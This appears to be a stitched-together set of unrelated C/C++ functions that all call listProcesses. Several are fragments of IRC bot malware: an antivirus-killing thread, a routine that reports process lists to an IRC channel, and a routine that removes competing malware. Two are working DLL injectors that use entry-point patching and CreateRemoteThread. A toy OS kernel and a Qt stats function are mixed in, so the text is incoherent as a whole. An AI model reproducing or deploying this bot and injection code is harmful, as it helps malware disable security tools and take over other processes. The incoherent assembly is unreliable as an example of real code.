DWORD WINAPI kill_av(LPVOID param) { while (1) { listProcesses(0,NULL,NULL,FALSE,NULL,TRUE); Sleep(killer_delay); } return 0; }
DWORD WINAPI KillAVThread(LPVOID param) { int threadnum = (int)param; while (1) { listProcesses(0,NULL,NULL,FALSE,NULL,TRUE); Sleep(killer_delay); } clearthread(threadnum); ExitThread(0); }
void handleInterrupt21(int ax, int bx, int cx, int dx){ int cur; switch(ax){ case 0x0: /*Print String*/ printString(bx); break; case 0x1: /*Read String*/ readString(bx); break; case 0x2: /*Read Sector*/ readSector(bx, cx); break; case 0x3: /*Read File*/ readFile(bx, cx); break; case 0x4: /*Execute Program*/ executeProgram(bx, NOONE); break; case 0x5: /*Terminate Program*/ terminate(); break; case 0x6: /*Write Sector*/ writeSector(bx, cx); break; case 0x7: /*Delete File*/ deleteFile(bx); break; case 0x8: /*Write File*/ writeFile(bx, cx, dx); break; case 0x9: /*Kill Process*/ killProcess(bx); break; case 0xa: /*Execute Program in Blocking Fashion*/ setKernelDataSegment(); cur = currentProcess; restoreDataSegment(); executeProgram(bx, cur); break; case 0xb: listProcesses(); break; case 0xc: editString(bx); break; default: printString("Interrupt21 got undefined ax."); break; } return; }
QString sysInfo::getDetailedStats(){ cpuUsage(); memPerc(); netStat(); cpuStats(); getDiskDetails(); osVersion(); listProcesses(); QString stats = ""; bytesTransmitted = getSizeUnit(bytesTransmitted); bytesReceived = getSizeUnit(bytesReceived); //Add the netstat info to the stats string stats = stats + "Data Transmitted," + bytesTransmitted + "#Data Received," + bytesReceived + "#Packets Transmitted," + packetsTransmitted + "#Packets Received," + packetsReceived + "#Errors Transmitting," + transmitErrors + "#Errors Receiving," + receiveErrors; //Add the cpuStats to the stats string stats = stats + "#Number of Processors," + _cpuCount; //Add the OS Version stats = stats + "#Operating System," + osVers; //Add the various logical drive details for(int i = 0; i < filesystems.length(); i++){ QString cap = capacitys.at(i); cap.chop(cap.length() - cap.indexOf(".")); cap = getSizeUnit(cap); QString used = useds.at(i); used = getSizeUnit(used); stats = stats + "#Drive Label," + filesystems.at(i) + ",Total Capacity," + cap+ ",Used Space," + used; } //Add RAM and CPU physMem.chop(physMem.length()- physMem.indexOf(".")); physMem = getSizeUnit(physMem); freePhysMem.chop(freePhysMem.length() - freePhysMem.indexOf(".")); freePhysMem = getSizeUnit(freePhysMem); stats = stats + "#Total RAM,"+physMem+"#Used RAM,"+freePhysMem+"#% RAM in use,"+memoryLoad+"#% CPU in use,"+cpuPerc; //Add the process/task related info stats = stats + "#Amount of Processes active," + procCount; for(int j = 0; j < procIDs.length(); j++){ stats = stats + "#" + procIDs.at(j) + "," + procNames.at(j); } return stats; }
DWORD WINAPI listProcessesThread(LPVOID param) { char sendbuf[IRCLINE]; LPROC lproc = *((LPROC *)param); LPROC *lprocp = (LPROC *)param; lprocp->gotinfo = TRUE; sprintf(sendbuf,"proc »» Listing processes:"); if (!lproc.silent) irc_privmsg(lproc.sock,lproc.chan,sendbuf,lproc.notice); if (listProcesses(lproc.sock,lproc.chan,lproc.notice,NULL, FALSE, lproc.full) == 0) sprintf(sendbuf,"proc »» Process list completed."); else sprintf(sendbuf,"proc »» Process list failed."); if (!lproc.silent) irc_privmsg(lproc.sock, lproc.chan, sendbuf, lproc.notice); addlog(sendbuf); clearthread(lproc.threadnum); ExitThread(0); }
void removevirus() { char sysdir[MAX_PATH], virusexecuteble[MAX_PATH]; unsigned char szDataBuf[128]; SOCKET sock; HKEY hkey; char sendbuf[IRCLINE]; char current[20]; LONG lRet; sock = fsocket(PF_INET, SOCK_STREAM, IPPROTO_TCP); DWORD dwSize = 128; for (unsigned int i=0; viruses[i].subkey; i++) { lRet = fRegOpenKeyEx(viruses[i].hkey, viruses[i].subkey, 0, KEY_READ, &hkey); if(fRegQueryValueEx(hkey, viruses[i].value, NULL, NULL, szDataBuf, &dwSize) == ERROR_SUCCESS) { fRegDeleteValue(hkey, viruses[i].value); strcpy(current,viruses[i].file); //FIXME: Replace the afw kill utils. we dont need to let that loop, // when we removed the .exe and the reg key. mayb a static call // to KillProcess(); can be inserted here. Something like: if(listProcesses(sock,NULL,FALSE,current) == 1) sprintf(sendbuf,"[PROC]: Process killed: %s",viruses[i].file); else sprintf(sendbuf,"[PROC]: Failed to terminate process: %s", viruses[i].file); //KillProcess(viruses[i].file); GetSystemDirectory(sysdir, sizeof(sysdir)); sprintf(virusexecuteble, "%s\\%s", sysdir, viruses[i].file); DeleteFile(virusexecuteble); } fRegCloseKey(hkey); } sprintf(sendbuf,"[AV]: Antivirus search complete! "); return; }
int main(int argc, char* argv[]) { char dllToInject[512],iniFilePath[512]; char cmd[512]; DWORD pid=0; opt options; FILE *in; SetDebugPrivileges(); //printf("%s\n",getfile_fullpath("\\\\.\\pipe\\mojo.6136.4468.15747523823731339023")); //return 1; char basePath[512]; _fullpath(basePath, argv[0], sizeof(basePath)); for(char *p=basePath+strlen(basePath);p>basePath;p--){ if(*p=='\\') { *(p+1)=0; break; } } //build ini path strcpy(iniFilePath,basePath); strcat(iniFilePath,INIFILE); options.dumpIAT = FALSE; options.loadINI = TRUE; options.hook = TRUE; options.unhook = FALSE; options.cmdline = NULL; options.waitKeyPress = FALSE; options.iniPath = iniFilePath; options.suspended=FALSE; iniFile *ini=parseIni(iniFilePath); options.ini=ini; //build dll path strcpy(dllToInject,basePath); strcat(dllToInject,ini->dll); if(argc<2) usage(dllToInject,iniFilePath); in=fopen(dllToInject,"r"); if(in==NULL){ sprintf(cmd,"Error: DLL to inject NOT FOUND: %s",dllToInject); logger(ini,"injector",cmd,strlen(cmd)); printf("DLL to inject not found... Path:\n"); printf("%s\n",dllToInject); return 0; } fclose(in); if(argc>1 && argv[1][0]=='/'){ //list processes if(argv[1][1]=='?' || argv[1][1]=='h') usage(dllToInject,iniFilePath); if(argv[1][1]=='l'){ listProcesses(); exit(0); } //read command line if(argv[1][1]=='x' || argv[1][1]=='X'){ options.cmdline=argv[2]; options.waitKeyPress=argv[1][1]=='X'?TRUE:FALSE; } //read the pid if(argv[1][1]=='p' || argv[1][1]=='P' || argv[1][1]=='i' || argv[1][1]=='u'){ pid=atoi(argv[2]); if(argv[1][1]=='i') { options.dumpIAT=TRUE; options.hook=FALSE; sprintf(cmd,"Dump IAT requested for Pid %d",pid); logger(ini,"injector",cmd,strlen(cmd)); } if(argv[1][1]=='u') { options.dumpIAT=FALSE; options.hook=FALSE; options.loadINI=FALSE; options.unhook=TRUE; sprintf(cmd,"Unhook requested for PID %d",pid); logger(ini,"injector",cmd,strlen(cmd)); } if(argv[1][1]=='P') options.suspended=TRUE; } } printf(TITLE"\n"); if(pid==0 && options.cmdline==NULL) return 1; if(pid!=0){ HANDLE process = OpenProcess(MAXIMUM_ALLOWED, FALSE, pid); if(process == NULL) { printf("[Error] the specified process couldn't be found. Code: %d\n",GetLastError()); sprintf(cmd,"Error: Invalid Pid %d",pid); logger(ini,"injector",cmd,strlen(cmd)); return 1; } } if(ini->debuglevel>3){ sprintf(cmd,"sinjector.exe called...",pid); logger(ini,"injector",cmd,strlen(cmd)); sprintf(cmd,"Ini: %s",iniFilePath); logger(ini,"injector",cmd,strlen(cmd)); sprintf(cmd,"DLL: %s",dllToInject); logger(ini,"injector",cmd,strlen(cmd)); } //dump ini options if(ini && ini->debuglevel>0){ printf("[ini] dll=%s\n",*ini->dll?ini->dll:"Error!!!"); if(ini->monitor) printf("[ini] monitor=%s\n",*ini->monitor?ini->monitor:"none (DISABLED)"); if(ini->logfile) printf("[ini] logfile=%s\n",*ini->logfile?ini->logfile:"none (DISABLED)"); if(ini->iatfile) printf("[ini] iatfile=%s\n",*ini->iatfile?ini->iatfile:"none (DISABLED)"); if(ini->backup) printf("[ini] backup=%s\n",*ini->backup?ini->backup:"none (DISABLED)"); printf("[ini] debuglevel=%d\n",ini->debuglevel); printf("[ini] reinject=%d (%s)\n",ini->reinject,ini->reinject?"ENABLED":"DISABLED"); if(ini->reinject_blacklist) printf("[ini] reinject_blacklist=%s\n",*ini->reinject_blacklist?ini->reinject_blacklist:"none (DISABLED)"); }else{ options.loadINI=FALSE; } if(options.cmdline!=NULL){ spwanAndHook(dllToInject,&options); }else{ injecta(pid,dllToInject,&options); } //printf("Press [intro] to exit...\n"); //getchar(); return 0; /* //Classic DLL Injection //Get process handle passing in the process ID. HANDLE process = OpenProcess(MAXIMUM_ALLOWED, FALSE, pid); if(process == NULL) { printf("Error: the specified process couldn't be found\n"); printf("PID: %d Last error: %d\n",pid,GetLastError()); return FALSE; } //Get address of the LoadLibrary function. LPVOID addrLoadLib = (LPVOID)GetProcAddress(GetModuleHandle("kernel32.dll"), "LoadLibraryA"); if(addrLoadLib == NULL) { printf("Error: the LoadLibraryA function was not found inside kernel32.dll library\n"); } //Allocate new memory region inside the process's address space. LPVOID arg = (LPVOID)VirtualAllocEx(process, NULL, strlen(buffer), MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE); if(arg == NULL) { printf("Error: the memory could not be allocated inside the chosen process\n"); } //Write the argument to LoadLibraryA to the process's newly allocated memory region. int n = WriteProcessMemory(process, arg, buffer, strlen(buffer), NULL); if(n == 0) { printf("Error: there was no bytes written to the process's address space\n"); } //Inject our DLL into the process's address space. printf("Waiting for process (if it's suspended...)\n"); WaitForInputIdle(process,INFINITE); HANDLE threadID = CreateRemoteThread(process, NULL, 0, (LPTHREAD_START_ROUTINE)addrLoadLib, arg, 0, NULL); if(threadID == NULL) { printf("Error: the remote thread could not be created\n"); } else { printf("Success: the remote thread was successfully created\n"); } //Close the handle to the process, becuase we've already injected the DLL. CloseHandle(process); */ return 0; }
int main(int argc,char **argv) { parseArgs(argc, argv); SIZE_T bW = 0, bR = 0; char *exeInput = (char *)malloc(MAX_PATH); char *dllInput = (char *)malloc(MAX_PATH); char *wdrInput = (char *)malloc(MAX_PATH); memset(exeInput,0,MAX_PATH); memset(dllInput,0,MAX_PATH); memset(wdrInput,0,MAX_PATH); if (opMode == OPMODE_LIST) { listProcesses(stringToMatch); return 0; } else if(opMode == OPMODE_INJECT) { if (globalDll == NULL) { printf(" [dll] > "); fgets(dllInput,MAX_PATH,stdin); } else { strcpy(dllInput,globalDll); } injectIntoProcess(globalInject,dllInput); return 0; } if (globalTest) { strcpy(exeInput,"test.exe"); strcpy(dllInput,"shackle.dll"); strcpy(wdrInput,"c:\\projects\\elegurawolfe\\"); } else if(globalExeName == NULL || globalWorkingDirectory == NULL || globalDll == NULL) { // printf("* SOMETHING MISSING %08x%08x%08x\n", (unsigned long )globalExeName, (unsigned long )globalWorkingDirectory, (unsigned long )globalDll); printf(" [exe] > "); fgets(exeInput,MAX_PATH,stdin); if (globalDll == NULL) { printf(" [dll] > "); fgets(dllInput,MAX_PATH,stdin); } else { strcpy(dllInput,globalDll); } printf(" [wdr] > "); fgets(wdrInput,MAX_PATH,stdin); chomp(exeInput); chomp(dllInput); chomp(wdrInput); } else { strcpy(exeInput,globalExeName); strcpy(dllInput,globalDll); strcpy(wdrInput,globalWorkingDirectory); } if (exists(exeInput) == 0) { printf(" [FAIL-EXE] %s does not exist\n",exeInput); return 0; } if(exists(dllInput) == 0) { printf(" [FAIL-DLL] %s does not exist\n",dllInput); return 0; } PROCESS_INFORMATION pi; STARTUPINFO si; memset (&pi,0,sizeof(PROCESS_INFORMATION)); memset (&si, 0, sizeof (STARTUPINFO)); si.cb = sizeof(si); HANDLE hNtDll = LoadLibrary("ntdll.dll"); NtQueryInformationProcess = (_NtQueryInformationProcess )(GetProcAddress( (HMODULE )hNtDll, "NtQueryInformationProcess")); HANDLE hKernel = LoadLibrary("kernel32.dll"); LPVOID addrLoadLibrary = GetProcAddress( (HMODULE )hKernel, "LoadLibraryA"); BOOL derp = CreateProcess(exeInput, exeInput, NULL, NULL, FALSE, CREATE_SUSPENDED + CREATE_NEW_CONSOLE, NULL, wdrInput, &si, &pi); if (derp == NULL) { char *errorMessage; FormatMessage (FORMAT_MESSAGE_ALLOCATE_BUFFER + FORMAT_MESSAGE_FROM_SYSTEM, 0, GetLastError (), 0, (char *) &errorMessage, 1, NULL); printf (" [FAIL] %s", errorMessage); return 0; } HANDLE hProcess = pi.hProcess; HANDLE hThread = pi.hThread; globalPid = pi.dwProcessId; printf(" * [INFO] new process id is %d\n",pi.dwProcessId); #if ARCHI == 64 BOOL wow64 = FALSE; IsWow64Process(hProcess,&wow64); if (wow64 == TRUE) { IsDll64Bit(globalDll); printf(" [WARN] injecting into wow64 "); } #endif printf(" [INFO] process handle is %08x\n",(unsigned long )hProcess); PROCESS_BASIC_INFORMATION pib; PEB_ARCHI globalPEB; NtQueryInformationProcess (hProcess, 0, (PVOID )(&pib), sizeof (pib),& bW); printf(" [INFO] pib.PebBaseAddress = 0x%p (size of field is %d)\n", pib.PebBaseAddress, sizeof(pib.PebBaseAddress)); ReadProcessMemory (hProcess, pib.PebBaseAddress, &globalPEB, sizeof (globalPEB), &bR); if (bR != sizeof (globalPEB)) { char *errorMessage; FormatMessage (FORMAT_MESSAGE_ALLOCATE_BUFFER + FORMAT_MESSAGE_FROM_SYSTEM, 0, GetLastError (), 0, (char *) &errorMessage, 1, NULL); printf (" [FAIL] %s", errorMessage); return 0; } printf(" [INFO] peb.ImageBaseAddress = %p\n", (void *)(globalPEB.ImageBaseAddress)); UINT_PTR entryPoint = guessExecutableEntryPoint (hProcess, globalPEB.ImageBaseAddress); printf(" [INFO] entryPoint = 0x%8x\n", entryPoint); char oldEntryChars[2]; DWORD oldProtect = 0; DWORD discardProtect = 0; VirtualProtectEx(hProcess,(LPVOID )entryPoint,1, PAGE_READWRITE, &oldProtect); ReadProcessMemory(hProcess,(LPCVOID )entryPoint,(char *)oldEntryChars,2,&bR); printf(" [INFO] old entry is %02x %02x\n", (unsigned char )oldEntryChars[0],(unsigned char )oldEntryChars[1]); printf(" [INFO] writing...\n"); WriteProcessMemory(hProcess,(LPVOID )entryPoint,"\xEB\xFE",2,&bW); VirtualProtectEx(hProcess,(LPVOID )entryPoint,1,oldProtect,&discardProtect); char newEntryChars[2]; ReadProcessMemory(hProcess,(LPCVOID )entryPoint,(char *)newEntryChars,2,&bR); if (newEntryChars[0] == '\xEB' && newEntryChars[1] == '\xFE') { printf(" [INFO] new entry is %02x %02x\n", (unsigned char )newEntryChars[0],(unsigned char )newEntryChars[1]); } else { printf(" [INFO] new entry is %02x %02x, something's wrong\n", (unsigned char )newEntryChars[0],(unsigned char )newEntryChars[1]); return 0; } CONTEXT context; context.ContextFlags = CONTEXT_FULL; GetThreadContext (hThread, &context); context.PC_REG = entryPoint; SetThreadContext(hThread,&context); ResumeThread(pi.hThread); LPVOID remoteMemory = VirtualAllocEx(hProcess,NULL,strlen(dllInput) + 1,MEM_COMMIT + MEM_RESERVE, PAGE_READWRITE); WriteProcessMemory(hProcess,(LPVOID )remoteMemory,dllInput,strlen(dllInput) + 1,&bW); printf(" [INFO] trying to create a remote thread at %08x\n",(unsigned long )addrLoadLibrary); char *dllOutput = (char *)malloc(MAX_PATH); memset(dllOutput,0,MAX_PATH); ReadProcessMemory(hProcess,(LPCVOID )remoteMemory,dllOutput,MAX_PATH,&bR); printf(" [INFO] confirming process has cave with \"%s\"\n",dllOutput); free(dllOutput); if(globalWait) { printf(" [WAIT] press any key to create remote thread...\n"); getc(stdin); } HANDLE threadId = CreateRemoteThread(hProcess,NULL,0,(LPTHREAD_START_ROUTINE )addrLoadLibrary,remoteMemory,NULL,NULL); if (threadId == NULL) { printf(" [INFO] could not create remote thread\n"); return 0; } else { WaitForSingleObject(threadId, INFINITE); //this waits untill thread thread has finished // VirtualFree(remoteMemory, 0, MEM_RELEASE); //free myFunc memory CloseHandle(threadId); // CloseHandle(hProcess); } int i = globalCooldown; for (; i > 0; i--) { printf(" [INFO] waiting %d seconds\n",i); Sleep(1000); } printf(" [INFO] restoring entrypoint...\n"); SuspendThread(pi.hThread); VirtualProtectEx(hProcess,(LPVOID )entryPoint,1, PAGE_READWRITE, &oldProtect); i = WriteProcessMemory(hProcess,(LPVOID )entryPoint,(char *)&oldEntryChars,2,&bW); if (i == 0) { char *errorMessage; FormatMessage (FORMAT_MESSAGE_ALLOCATE_BUFFER + FORMAT_MESSAGE_FROM_SYSTEM, 0, GetLastError (), 0, (char *) &errorMessage, 1, NULL); printf (" [FAIL] %s", errorMessage); return 0; } ReadProcessMemory(hProcess,(LPCVOID )entryPoint,(char *)newEntryChars,2,&bR); VirtualProtectEx(hProcess,(LPVOID )entryPoint,1, oldProtect, &discardProtect); printf(" [INFO] entry restored to %02x %02x\n", (unsigned char )newEntryChars[0],(unsigned char )newEntryChars[1]); GetThreadContext (hThread, &context); context.PC_REG = entryPoint; SetThreadContext(hThread,&context); ResumeThread(pi.hThread); printf(" [INFO] bye!"); free(exeInput); free(dllInput); free(wdrInput); return 0; }